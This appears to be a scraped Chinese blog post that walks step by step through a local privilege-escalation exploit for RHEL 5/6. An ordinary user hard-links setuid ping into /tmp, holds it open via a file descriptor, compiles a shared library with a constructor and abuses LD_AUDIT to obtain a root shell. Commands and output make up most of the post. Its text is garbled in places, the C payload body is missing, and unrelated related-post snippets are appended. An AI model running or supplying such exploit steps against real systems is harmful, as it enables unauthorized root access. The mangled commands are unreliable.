RHEL5 6普通使用者提權

2021-09-20 20:29:22 字數 3580 閱讀 1839

1

2

[root@ns ~]# whoami   ##我是誰

root

1

2

3

4

[root@ns ~]# useradd putong

[root@ns ~]# su - putong

[putong@ns ~]$whoami

putong

1

2

3

4

5

6

7

8

9

10

11

12

[putong@ns ~]$ ll -d/tmp/

drwxrwxrwt. 3 root root 4096 12月  2 03:11/tmp/

[putong@ns ~]$cd/tmp/

[putong@ns tmp]$mkdirceshi

[putong@ns tmp]$ln/bin/ping/tmp/ceshi/ceshi##建立乙個硬鏈結

[putong@ns tmp]$ ll !$

ll/tmp/ceshi/ceshi

-rwsr-xr-x. 2 root root 40760 9月  26 2013/tmp/ceshi/ceshi

[putong@ns tmp]$exec3</tmp/ceshi/ceshi##系統呼叫exec是以新的程序去代替原來的程序,但程序的pid保持不變。因此,可以這樣認為,exec系統呼叫並沒有建立新的

程序,只是替換了原來程序上下文的內容。原程序的**段,資料段,堆疊段被新的程序所代替。

[putong@ns tmp]$ ll/proc/$$/fd/3

lr-x------ 1 putong putong 64 12月  2 03:19/proc/1346/fd/3->/tmp/ceshi/ceshi

1

2

3

[putong@ns tmp]$rm-rf/tmp/ceshi/

[putong@ns tmp]$ ll/proc/1346/fd/3

lr-x------ 1 putong putong 64 12月  2 03:19/proc/1346/fd/3->/tmp/ceshi/ceshi(deleted)

1[putong@ns tmp]$ vim root.c##建立乙個c語言指令碼

1

2

3

4

5

6

void __attribute__((constructor)) init()##注意;__這是兩個_下劃線

:wq

12

3

4

5

6

7

8

9

[putong@ns tmp]$ gcc -w -fpic -shared -o/tmp/ceshiroot.c## -o 輸出

[putong@ns tmp]$ ll/tmp/ceshi

-rwxrwxr-x 1 putong putong 6017 12月  2 03:25/tmp/ceshi

[putong@ns tmp]$ ld_audit="origin"exec/proc/self/fd/3

error: ld.so: object'origin'cannot be loaded as audit inte***ce: cannotopenshared objectfile; ignored.

usage:ping[-lrubdfnqrvvaa] [-c count] [-i interval] [-w deadline]

[-p pattern] [-s packetsize] [-t ttl] [-i inte***ce or address]

[-m mtu discovery hint] [-s sndbuf]

[ -t timestamp option ] [ -q tos ] [hop1 ...] destination

1

2

3

[root@ns ~]#

[root@ns ~]# whoami

root

RHEL6普通使用者提權到root

需要首先有個普通使用者的shell 實驗環境 rhel6.8 應該只針對rhel 5 6,別的版本沒試 如下都是在普通使用者下執行的,例如oracle使用者 mkdir tmp exploit ln bin ping tmp exploit target exec 3 tmp exploit tar...

提權學習 Linux普通使用者提權為root

當你的才華 還撐不起你的野心時 那你就應該靜下心來學習 目錄 linux普通使用者提權為root 接下來直接看例項 我記得我以前用linux的時候,忘記root密碼是常有的事情,很多時候大家都會選擇重啟系統,進入單使用者模式重置root密碼,但在實際運維工作中,就未必能任性重啟了。分享乙個不必重啟也...

普通使用者裝配MySQL 普通使用者裝配MySQL

普通使用者安裝mysql linux這點很好,即使沒有許可權,也可以將自己想要的程式什麼的安裝到自己有許可權的目錄下。介紹一下怎麼在非root用 許可權下安裝mysql 參考 二 編譯 1 打上補丁 解壓mysql,並進入mysql 5.1.42目錄後,執行 patch np1 i mysql 5....